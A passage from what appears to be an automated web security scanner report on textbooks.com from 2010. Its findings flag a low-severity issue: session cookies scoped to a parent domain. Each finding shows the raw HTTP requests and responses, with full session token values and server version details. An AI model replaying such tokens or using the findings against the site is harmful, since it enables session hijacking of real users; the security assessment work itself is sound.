TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Content-Length: 25374
Connection: close
Set-Cookie: TBSESSION=1pesYoGAQove8asXg%2FLQi3Odk%2FALvaMYWu4u5JdrXTswRUYUKJvQ7xvzZDAfEgGZUlgQdk0f2GecdTZ4qhGUXZ0yT3xlVp3q%2BMehNWH1ykufc%2BUXdB3NVfdJrrjBDK8gumhqKLWu0AnbdX5fvbqtoQjunBi75eZszh1B7jF6RpGjFzW%2FNuQqdz2nzK0VFeUkFOtMW95SAVCwyyverIx0vCc9sE%2BC6dFtzuJ2AH624CJYm8cPTMeM0L%2B6WDvSzbNQJIYrc0pCKK6mSWoArebTZiGaIOpXIf3AtesREiYJRduH1CUhC3mMZWjnPPGKgLkRJdbQLTZw1sZ7XT2aZCMkGa3ru5%2FagVViWzzbpVRxz%2FgKx7QSWWbAGBRHVhNtmnVpxVB3gwMjKydAeKz2mzXmakCZnc4XzhAnvipACD6WTEgoNZ%2FbV5n%2BWrkaPUnY02ky7ylalmqoOcyNbCApYgIvT1h5ATGTLViVs3A4Nxsv7T%2FLMELKk0XheRpXRtLixaAlRyVESWhMQqVk3NALmjFRs90VKA2rh3UFDYhO4e1NrU2%2Bi1mPTJeGYCrWhn2n8MlWUJgr62VVmrWzAWjobClto930h9w7p2W2gdHmydwE92UJMgUJdgIXK9tW3WK6u5anDGcM21gakIejWSQX0ziA8yOuynqIz5zNX4eZcZ%2FAVB3qJomp23e5A8Bq9W1GhI4EPhI3P92ddZL7zzWteX5IDod8B1KeMXNBbl8b4mhv7USPcWWdEiN7ZS9GeuomkLCMhlL0t0dS%2FQoJZAcOihkYy8Bh0Nb94Ar6S0hqAJMe4dmtIdqUITjELDtLPcmlnT%2BAQ04mgLrjehopCBnaiiJh1du7AHiopQapjoXiBm2N47DxuhFiZoagJcXo8P%2BtzRC8sCJjE1cXBPdnaAaxmkoOuuIqWLVV5w6dmg0GPNXOZM9F0X0vnhLmmom343SLzQyKw2QZUQt0mXnbfYPnQFpVNp%2BLxYCo%2FcE5oeGmLUkcpb%2B0Q2KBD5UMGw%2Bjb6ZYk0aojaqDdriVkm2IFGMy1Oy0gRoshgDlx2C%2BWtaKoQStdj4FFACl2chT6cW0ouSCrUX5PBzyp9cF9csPIOqFYV3vvXKHHkkjkAPHQ66Te0TdZi6FQy1j17BXSBQWewkrg9jE9yJtidLhlgOuW0RXxm0vxtxyk5MuiBkZ23izbuw7yqvEbGfnmCfVWKeYcNlE3m7jbAJH420GPadN%2FNAKWG05sDaKuyNbdl7uGyqOJO7ewKXblbDdrq%2BuxmgEj3E%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=KMxvh%2F01XScLHyvOudc%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IyVuCqYuAWRptohxdfBhEwi0m%2ByBINgd5n6P0FIbcFqpmFLzV1mhy69WGBLhGH%2BRENyUVFCGInw8HUIU%2Bg6OUg9hFzrlYo5Ammn1QoPOILU4kXdaracKHVPT%2BOYr9m8C2B6R6%2FaQpqtkkdxkqR%2BRRU1G02%2BCZE0ZG5hSK9jsRP%2FsnDBjxsu%2BEhDjZzUjdSVwbHDxjHoevpr6GIUVRo163cSyh6jISraIqhEni5kZMH1iX2dujVQfo5VHnyQoSHbpspzTsHqouDJhpr3dlNJB1GcwDlfyR4Jm4cWvzinzcPwnAQ5Tj8w6HY7dJOacd%2F9qhZuo27w3FDBOZDEeuilokoiSW1YRYGr1EXuNON%2BGcUXLGQwYJ%2BqvFrFQAVI%2F2fWEgN58JlrncGg6Lsty%2BuoSxFPiVE05XwurJJ%2BEaX5zfXcbvFJrJglFGYDd5VmMTdqZJsf%2BcaGfP72PjXsIjPv0kLLQBLpT%2B%2BZ%2Bryn9DzDahPy%2FrrMy91jFH5Ig4Sv7mF%2FmoxYrK6UkRz3yQMcAVStWgfp1ULZ92IDOZYwXaNqn5hRgxCYQRfRpyx9Sw6%2Bp1K%2FBISiRto15j5ewiXjKtCKFbgeRCXksJ3rq7w3%2B2%2Bug2tAyWuZkbxdZ8kh4SsHHv1pfieN%2BtkTG0kd19Qg2S2%2F%2BpQm%2BSauQ0KCRThiA6hzkd%2FMl7%2FNxK6pWI6kVjuun96kA6gcfTE7aw1xxY48ZOsxWfSffkqXL9ohW%2B%2B8CB%2F%2FBYup3v1fwHsF54WRA0V7wxRr7rrwl8JQ%2FR0dG17xDyn%2FI4VWEXCroQYsQqV%2BXkFdpCGYOONkbdJTCXpzh5Pr0%2BDQ3MOmKG7uR%2BEmpDjO6mP1%2Bp7keOPZFGYjDb1ACSBvYBbWUYmvI6fhOIZJAZCx49nVBiKS9JG5H4FRZPFw9iwh5%2FABth0gvtxBeU52MdVkNc2x%2B%2BjpWxxwHsI3pdabQM79nqHP0VZn36dNnyCWF10rkOpKnzdwBKwAcuMMqtywxHUejZeF2BQ%2BCfS9gJKL7VSkwEEpNko2I6qIdKCi5oSbUDcOr26DJ7INnKnuTqbR%2B5xOA0cRFdiV7QjxacrFzAILYLRww7vI7ljvxXqGfUmV6ZJk8Bu1ZqbHBB%2BoQFNdluxujPmVG6AClGRGImYFqDom7TovsCaSlGu%2BBlqxtsgGv5wNOUD23TwizdTImIrrgTYMAPvIp%2F62v%2BgVUpd2RVqgqDqOUZHZdeLhOpTHZ%2Bo8NW7nDo3cuReUYCCRnU1x0zJiKQUVP%2FqTIeVQ6aek%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=5lanJ%2BfFuYAsp73%2FIYk%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 132548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=yLw4NO06c6Ga7KUhlK5wiP992BOqjFKWOhemXEGhBc6V5AGLwU8DWmOwL2UoJzpcQNxL%2F5haD9piZhrh2Q1uaWUTwfZn93cBIL4bgpGL3t%2B%2FvFzFkMPADykRoFsjYiz7EgOqlMOUTgHREi2i7SwIWdU7Em6XFwzgeQlJ8Ys8M3AiesvsRvufPDd4EWa1lHTTRJ9NbRq2lJ5wMP0GIrLyJc0mnDfPRYY%2Fe1RDdHvzuoIXOXUhisbL2H7RvO7st4N1Cxs%2BGOPAwso4h9e28UUnqRADqKNKw%2FBqQKlVtPkBRfltVsXOaDHWE5LMK7S8y5bR6cRhuCb8aBb5kAX3tLNw4O3wNKgM2aPkr%2FD52c13ZdKXwf0s4hpRQlLzdLrT53vaaZ%2F3I4cuWw9X9hn6xwWxrKLS%2F2Elk28ccN6mZ1RTAGMczm2ArnzVfmfZUKGYYGsYVF00i1bnzMtzZQ8TEW0iZju4PT4qx%2BL37rqgOhFNT3g7OrXtVDDWQBLY4prxY10sRwKWpP7Uo9TMspLZTAZLS9Nbg7AtlVq5hFEHqwhEKbwN00o%2FvB%2FnfDrCLv2NaZIw3KfAiA%2FwsFe8Y4EHiSlp46tiZiG2O7r271jW95pqfqm5jkBhWpv2DFCowX%2BZ5uwsWtM2HdGDt0nhNMLsqzoSAkNBg01jRa%2FCM7lfvqAzsU62F2UdeQZkAYEONskjmPviQK9oRRvsBRvuZTET0dj2iuumIMnuZk0fKZDCU5AwPUyGnIyeHwOtj9mEL53hUUS47nbP0FwmxRshcQG5N6kV%2B7WSibTCG1gRKaWIAwgfMBiPx%2FhbnbA%2B0i%2B6M%2FbQimIf1oLeVvNvMATITrwxNhLr1zZLvDoAFrB83lJzm%2BR5xCx2w8V0PTZQKCsF%2F9VzZmCBCPmh35EWoiE5WBEgSWCIdw6oqwb24yEPnuwGC7YBUeXy83gW1NlGTcv6X8NrKQJPB8aeLwKghDVnjpJme1%2FmxDZAZHtZn8PeCJ39LCPqRMI4lxwhJHxpEuV%2BLpHNlbv%2BjWk%2FROHyImna5RNnYFWgkKAd9U%2F3zuqN0p5%2B5mhePHCZcsmd5rU1fs%2BADbu0wuiiR7AMNit3NSZNW5V46XGCHVnVKDUwhgchZ%2FAYr1U%2BR37uOI3nO8vqMlWcqmD7c%2F2MIYmmezSAGvCRI6tj7swTXEioQMDEQuZ6ndNCFPuKtaRL0gNyqSUfDnVTxkbOulYihWyRjAaIDNt85QZwkoaT5PGiGabeP%2FSoKFfxKp%2FxdUf5VaQmEF4UjE0%2FJ%2Fk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=Po61YNkCwF%2Borj5Wwmo%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 100118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GflvJakRFJaZHar64sgfpixyIJizFExoPvfubgEHX74mYNU9eYfkv2DS85usjXepowH7reKOL%2BzuU3joe9lQtqX5NQlUHVGyTiem7A03mPnPgmg3KMEU6EzBsoaym9p2wfAUdQtkAY%2BhrpqX5Oxliu9VLNMVseOUaRftoQ%2FSlTCuRYK5hNVeDGGW9nd0pgUPotohkcrUveC085TRLxGNs8FcPElxfraVMuyracMhCpfrxeYg7KSDOzjBOMT%2BIQlW%2FwYIo8o3zGO2CNXIp4JQFijjBjEYTe0CbgfPZomv6QWWdNgdJf%2BxPuLFPH5mdkOE5mEdaZ%2FBSctcu21fqkZPBLkAd6tpM4fR5B9pKhsJM24yxnXvtMHlIJwxObKX912Wx8xcgOn6VmtRdrZUYDyKuENQQDyqwjXIa9D3JVdhUn%2BzflRaRo8s0ZP359TMfNN9k7oPCiS74%2B72KcLoW59DsNpQ3E0ATOUbp32lHoFOUq5LnNgJZbuQ3b8SZFymlG84sgEmaaqG1iMncLSqLlDxJB717qYuTWhD%2BVDgpY9gaK2NLogL4SI8%2FbJQDRVFjytQGdliajuLFgZLG5%2ByeXRRVaq6Db7w%2B6i4EgdIpIFZBs5BDNPLMTpHNwU3Cs8lhxE0vhX6YWX56fFr7mnBBmcbjhLgkHsJbsgJ5keVXHcIl0ELQK08WDby19mFIQjqaSVeb11QKD8ow27Bl1%2B1wH6O%2FOSlWDknFM4OfqtKpdUNq6kAyT%2Bld%2FTcyCWHrTpZNct6knZUXJh7Yk8S9bW3saCm0nJw%2Bh6D9mYO8UEtEzLM9VBmZmpVLZb7RIzez9kOlae9Hs%2B4PRlybJf8qtmqgfVzEjvt2z3sjH6bMoTiBlI0YoH5N6u7eux927Er64xNz2Od23ubQbsIWoh6kSPyhm104Vl06jjvMnsZo3%2BheDsiKiPKGx1Q7fmf98TH%2FVKzM%2BM6KOMbeRswvPk5KYoxjtZ2le%2FPw%2BVXot6ByHfv%2FDwy5m5lf6h5WLD%2BHIiXaTS6mr30ISUba34baGYm0EXzmo%2Bxpy73LARAWIIM8rLdxX%2BOlvvRYYjayWKApEY9kRkNSQFGtCnTTPZ%2Bz1kdD9o0gvjv8y0SWCSTN2bBl7F30PmpNGu5vgPi7vcMsAoISW2OiA2Iuog4j5Rxzm7Yjhg5GXlAzI%2BSXK9WI6clxDFUD1RkSWm2D0CZKO83%2BWP5BJ8zoMPMM2fdMJOIzdYEWPoJEgD1nO%2BOrZrqKIbbRGvFZY%2F7LF0z6uZyz%2BSLGgYtqi0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=ypV4xbizAJKCvg8uCNg%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 122719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgki